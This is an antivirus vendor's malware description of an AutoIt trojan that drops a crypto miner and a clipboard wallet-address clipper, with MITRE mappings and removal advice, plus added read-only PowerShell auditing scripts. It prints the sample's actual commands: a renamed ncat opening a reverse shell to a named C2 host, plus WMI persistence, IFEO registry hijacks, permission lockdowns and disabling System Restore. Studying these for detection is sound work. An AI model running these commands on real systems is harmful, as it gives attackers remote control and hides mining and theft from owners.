
Trojan.AutoIt.1443

Added to the Dr.Web virus database: 2024-08-27

Virus description added:

  • 09cffca796dce03c74950e10a349079d9afe3964
  • 419ef7dc18d178247daf68f0571a3dccb662792f
  • 9c17f83aba6b60c8d461a923050fc9a19e386ec1
  • e7ac807a446640a95a961fb5d873c051ee8c2793

Description

Malicious AutoIt script for Windows that drops a number of files onto a compromised PC in order to carry out hidden cryptocurrency mining and to spoof data in the clipboard.

Operating routine

The script is launched by a dropper, which is a self-extracting archive. Once launched, Trojan.AutoIt.1443 will perform the following actions:

1. Check the process list for the following process names:

dUcAvastUI.exe
avgui.exe
avp.exe
avpui.exe
UninstallTool.exe
UninstallToolHelper.exe
SandboxieRpcSs.exe
SandboxieDcomLaunch.exe
httpdebuggerui.exe
wireshark.exe
fiddler.exe
vboxservice.exe
df5serv.exe
vboxtray.exe
vmtoolsd.exe
vmwaretray.exe
ida64.exe
ollydbg.exe
pIIfaXUcjllboZRestudio.exe
vmwareuser.exe
vgauthservice.exe
vmacthlp.exe
vmsrvc.exe
x32dbg.exe
x64dbg.exe
x96dbg.exe
vmusrvc.exe
prl_cc.exe
prl_tools.exe
qemu-ga.exe
joeboxcontrol.exe
ksdumperclient.exe
xenservice.exe
joeboxserver.exe
devenv.exe
immunitydebugger.exe
importrec.exe
windbg.exe
32dbg.exe
64dbg.exex
protection_id.exex
scylla_x86.exe
scylla_x64.exe
scylla.exe
idau64.exe
idau.exe
idaq64.exe
idaq.exe
idaw.exe
idag64.exe
idag.exe
ida.exe

If any of these processes are found, the script will terminate.

2. Create directories

C:\ProgramData\NUL..
C:\ProgramData\AUX..
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}
C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}

Set the SYSTEM, HIDDEN and READONLY attributes for the following directories: C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6} and C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}.

3. Unpack files

C:\ProgramData\NUL..\libssl-1_1.dll
C:\ProgramData\NUL..\vcruntime140.dll
C:\ProgramData\NUL..\libcrypto-1_1.dll
C:\ProgramData\NUL..\StartMenuExperienceHost.exe

These files are not malicious. They are required to implement network communication through the StartMenuExperienceHost.exe executable, which is a renamed ncat.exe. This file connects to the attacker's C2 server. It is detected as Tool.Ncat.1.

C:\ProgramData\AUX..\ShellExt.dll
C:\ProgramData\AUX..\DeviceId.dll

The ShellExt.dll file, which is unpacked to all directories created above, is a renamed AutoIt language interpreter. Here it runs a malicious script embedded in the overlay of the DeviceId.dll file, which has a valid digital signature. The script unpacks and launches the SilentCryptoMiner miner (detected as Trojan.BtcMine.3767), which is injected in the explorer.exe process using the Process Hollowing technique.

C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\ShellExt.dll
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\DeviceId.dll

Similarly, in this directory, the AutoIt interpreter (ShellExt.dll) initiated by nun.bat runs a malicious script embedded in the DeviceId.dll file overlay to mine cryptocurrency.

C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun.bat
C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellExt.dll
C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\7zxa.dll

This set of files is designed to run a clipper hidden in the 7zxa.dll library, which is also injected in explorer.exe using the Process Hollowing technique. The clipper spoofs cryptocurrency wallet addresses in the clipboard.

C:\ProgramData\inst.bat

This script performs the same functions as described below in item 4.1.

4. Create events and modify the registry

4.1 Add events that ensure connection to the C2 server using StartMenuExperienceHost.exe (ncat.exe)

wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="nut", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="nut", CommandLineTemplate="C:\ProgramData\NUL..\StartMenuExperienceHost.exe --ssl gamesjumpers[.]com 5353 -e cmd.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="nut"", Consumer="CommandLineEventConsumer.Name="nut""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="nur", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="nur", ExecutablePath="C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat", CommandLineTemplate="C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="nur"", Consumer="CommandLineEventConsumer.Name="nur""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="per", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="per", ExecutablePath="C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat", CommandLineTemplate="C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="per"", Consumer="CommandLineEventConsumer.Name="per""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="pers", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 900 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="pers", CommandLineTemplate="C:\ProgramData\AUX..\ShellExt.dll C:\ProgramData\AUX..\DeviceId[.]dll"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="pers"", Consumer="CommandLineEventConsumer.Name="pers""

4.2 Add registry keys to run malicious files using the IFEO technique

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MoUsoCoreWorker.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\svchost.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\svchost.exe" /v MonitorProcess /t REG_SZ /d "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrustedInstaller.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\TrustedInstaller.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\TrustedInstaller.exe" /v MonitorProcess /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f
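The persistence points from items 4.1 and 4.2 can be audited from a defender's side. The following PowerShell is an added example, not Dr.Web's code: it is read-only, lists permanent WMI subscriptions in root\subscription, IFEO Debugger and GlobalFlag values, and SilentProcessExit monitors. The function name is ours; the consumer names nut, nur, per and pers and the paths are the ones given above.

```powershell
# Added example (not Dr.Web's code). Read-only; run as an administrator.
function Get-Trojan1443Persistence {
    $knownNames = @('nut', 'nur', 'per', 'pers')   # consumer/filter names used by the sample

    # 4.1: permanent WMI subscriptions live in root\subscription. Report any
    # CommandLineEventConsumer with one of the sample's names or a command line under
    # C:\ProgramData, plus every filter-to-consumer binding so the WQL poll against
    # Win32_PerfFormattedData_PerfOS_System can be reviewed.
    Get-CimInstance -Namespace 'root\subscription' -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue |
      ForEach-Object {
        $cmd = ('{0} {1}' -f $_.ExecutablePath, $_.CommandLineTemplate).Trim()
        if ($knownNames -contains $_.Name -or $cmd -match 'ProgramData') {
            [pscustomobject]@{ Source = 'WMI CommandLineEventConsumer'; Key = $_.Name; Value = $cmd }
        }
      }
    Get-CimInstance -Namespace 'root\subscription' -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue |
      ForEach-Object {
        [pscustomobject]@{ Source = 'WMI binding'; Key = "$($_.Filter)"; Value = "$($_.Consumer)" }
      }

    # 4.2: IFEO. A Debugger value makes Windows start that program instead of the named image.
    # GlobalFlag 0x200 (512, FLG_MONITOR_SILENT_PROCESS_EXIT) combined with
    # SilentProcessExit\<image>\MonitorProcess launches the monitor when the image exits.
    $ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
    $spe  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit'
    Get-ChildItem -LiteralPath $ifeo -ErrorAction SilentlyContinue | ForEach-Object {
        $p = Get-ItemProperty -LiteralPath $_.PSPath
        if ($p.Debugger) {
            [pscustomobject]@{ Source = 'IFEO Debugger'; Key = $_.PSChildName; Value = $p.Debugger }
        }
        if ($p.GlobalFlag -band 0x200) {
            [pscustomobject]@{ Source = 'IFEO GlobalFlag'; Key = $_.PSChildName; Value = ('0x{0:X}' -f $p.GlobalFlag) }
        }
    }
    Get-ChildItem -LiteralPath $spe -ErrorAction SilentlyContinue | ForEach-Object {
        $p = Get-ItemProperty -LiteralPath $_.PSPath
        if ($p.MonitorProcess) {
            [pscustomobject]@{ Source = 'SilentProcessExit MonitorProcess'; Key = $_.PSChildName; Value = $p.MonitorProcess }
        }
    }
}

# Anything pointing at the dropped directories, the .bat files or the renamed ncat
# (StartMenuExperienceHost.exe under C:\ProgramData) matches this description.
Get-Trojan1443Persistence | Format-Table -AutoSize -Wrap
```

Legitimate software also uses IFEO and WMI subscriptions, so review each hit against the paths above rather than treating every entry as malicious.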

5. Configuration

5.1 Change directory permissions by running the following commands

icacls "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}" /deny *S-1-1-0:(DE,WDAC,WO,AS,AD,WEA,DC,WA,WD) /T /C
icacls "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}" /deny *S-1-1-0:(DE,WDAC,WO,AS,AD,WEA,DC,WA,WD) /T /C

This denies the Everyone group (SID S-1-1-0) the following permissions:

  • Delete
  • Change discretionary access control list
  • Write permissions for the owner
  • Change access control security settings
  • Create new subfolders and append data
  • Write attributes, including extended attributes
  • Delete subfolders and files
  • Create files and write data
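The directory artifacts from items 2 and 5.1 (reserved-name directories, SYSTEM/HIDDEN/READONLY attributes and the Deny ACE for Everyone) can be checked with the following PowerShell, an added example that is not Dr.Web's code. The function name is ours; the directory names are those listed above.

```powershell
# Added example (not Dr.Web's code). Read-only; run as an administrator so ACLs can be read.
function Get-Trojan1443DirArtifacts {
    $root = 'C:\ProgramData'
    # NUL.. and AUX.. are reserved device names with trailing dots; Win32 path normalisation
    # mangles them, so they are matched from a directory listing (which returns name and
    # attributes without opening the entry) instead of being opened by path.
    $names = @('NUL..', 'AUX..',
               'Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}',
               'Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}')
    Get-ChildItem -LiteralPath $root -Directory -Force -ErrorAction SilentlyContinue |
      Where-Object { $names -contains $_.Name } |
      ForEach-Object {
        $a = $_.Attributes
        $result = [ordered]@{
            Path           = $_.FullName
            Attributes     = $a
            # Item 2: SYSTEM + HIDDEN + READONLY set on the two Classic.{...} directories
            HiddenSystemRO = $a.HasFlag([IO.FileAttributes]::Hidden) -and
                             $a.HasFlag([IO.FileAttributes]::System) -and
                             $a.HasFlag([IO.FileAttributes]::ReadOnly)
            DenyEveryone   = $null
        }
        # Item 5.1: icacls /deny *S-1-1-0 adds a Deny ACE for Everyone. Only attempted for
        # names Get-Acl can open (no trailing dots).
        if ($_.Name -notmatch '\.\.$') {
            $acl = Get-Acl -LiteralPath $_.FullName -ErrorAction SilentlyContinue
            $result.DenyEveryone = [bool]($acl.Access | Where-Object {
                $_.AccessControlType -eq 'Deny' -and
                $_.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value -eq 'S-1-1-0'
            })
        }
        [pscustomobject]$result
      }
}

Get-Trojan1443DirArtifacts | Format-Table -AutoSize
```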

5.2 Disable System Restore by modifying the registry subkeys:

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore - DisableSR=1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore - DisableConfig=1

Then, the following command is executed:

reagentc /disable

5.3 Run the C:\ProgramData\inst.bat file

6. Obtain information about the compromised computer

The script sends a GET request to ip-api[.]com/json to obtain geolocation information. Information about the GPU model and installed antivirus software is collected using the winmgmt.exe utility, the CPU model is read from the HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 registry subkey, and information about the operating system is taken from the @OSVersion and @OSArch macros in AutoIt.

The collected information is sent to a Telegram bot.

Mitre Matrix

Execution (TA0002)
  • Windows Management Instrumentation (T1047)
  • Command and Scripting Interpreter (T1059)
  • Scripting (T0853)
  • Shared Modules (T1129)

Persistence (TA0003)
  • Event Triggered Execution (T1546)
  • Image File Execution Options Injection (T1546.011)
  • Boot or Logon Autostart Execution (T1547)
  • Registry Run Keys / Startup Folder (T1547.001)
  • Hijack Execution Flow (T1574)
  • DLL Side-Loading (T1574.002)
  • Services File Permissions Weakness (T1574.010)

Privilege Escalation (TA0004)
  • Process Injection (T1055)
  • Process Hollowing (T1055.012)
  • Event Triggered Execution (T1546)
  • Image File Execution Options Injection (T1546.012)
  • Registry Run Keys / Startup Folder (T1547.001)

Defense Evasion (TA0005)
  • Obfuscated Files or Information (T1027)
  • Masquerading (T1036)
  • Process Injection (T1055)
  • Process Hollowing (T1055.012)
  • Indicator Removal (T1070)
  • File Deletion (T1070.004)
  • Modify Registry (T1112)
  • File and Directory Permissions Modification (T1222)
  • Hide Artifacts (T1564)
  • Hidden Files and Directories (T1564.001)
  • Virtualization/Sandbox Evasion (T1497)

Discovery (TA0007)
  • System Information Discovery (T1082)
  • Software Discovery (T1518)
  • System Location Discovery (T1614)

Collection (TA0009)
  • Clipboard Data (T1115)
  • Screen Capture (T1113)

Command and Control (TA0011)
  • Encrypted Channel (T1573)

Impact (TA0040)
  • System Shutdown/Reboot (T1529)

Treatment recommendations

  1. If the operating system can be started (in normal mode or in safe mode), download Dr.Web Security Space and run a full scan of your computer and of all removable media you use. Learn more about Dr.Web Security Space.
  2. If the operating system cannot be started, change your computer's BIOS settings so that it boots from CD/DVD or from a USB drive. Download the Dr.Web® LiveDisk system rescue disk image or the utility for writing Dr.Web® LiveDisk to a USB drive, then prepare the USB drive. Boot the computer from it and run a full scan and treatment of the detected threats.

Please run a full system scan using Dr.Web Antivirus for Mac OS.

Please run a full scan of all disk partitions using Dr.Web Antivirus for Linux.

  1. If your mobile device is working normally, download and install Dr.Web for Android on it. Run a full scan and follow the recommendations on neutralising the detected threats.
  2. If the mobile device is locked by a Trojan of the Android.Locker family (a message about a serious violation of the law or a ransom demand is displayed on the device's screen), proceed as follows:
    • start your smartphone or tablet in safe mode (if you do not know how, consult the mobile device's documentation or contact the manufacturer);
    • then download and install Dr.Web for Android on your mobile device, run a full scan and follow the recommendations on neutralising the detected threats;
    • disconnect your device and reconnect it.

Learn more about Dr.Web for Android